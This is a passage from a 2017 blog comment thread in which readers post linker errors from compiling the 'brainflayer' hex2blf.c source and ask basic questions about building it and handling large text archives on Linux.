    fprintf(stderr, "[!] Bloom filter file '%s' is not the correct size (%ju != %d)\n", bloomfile, sb.st_size, BLOOM_SIZE);
    ^
    /tmp/ccMZW5gm.o: In function `main':
    hex2blf.c:(.text+0x9d0): undefined reference to `bloom_set_hash160'
    hex2blf.c:(.text+0xaaf): undefined reference to `exp'
    hex2blf.c:(.text+0xac3): undefined reference to `pow'
    collect2: error: ld returned 1 exit status

    Thank you, I will await your reply

    Reply
        • Wednesday, October 18th, 2017 at 08:19

          @Alex Could you please tell me how to work with such massive archives on ubuntu 14.04 or kali linux? What tool do you prefer? Is it possible to convert txt file to utf8 type automatically and how? Please leave links here in answer if you have such information. Thank you in advance.

  • Friday, October 6th, 2017 at 07:09

    Please sir can you give me a tip on how to compile the brainflayer source code.
    Thank you

    Reply
    • Friday, October 6th, 2017 at 08:01

      You use the make command to compile source code.

      Reply
  • Friday, October 6th, 2017 at 08:23

    Please can you give me an example of the command please?

    Reply
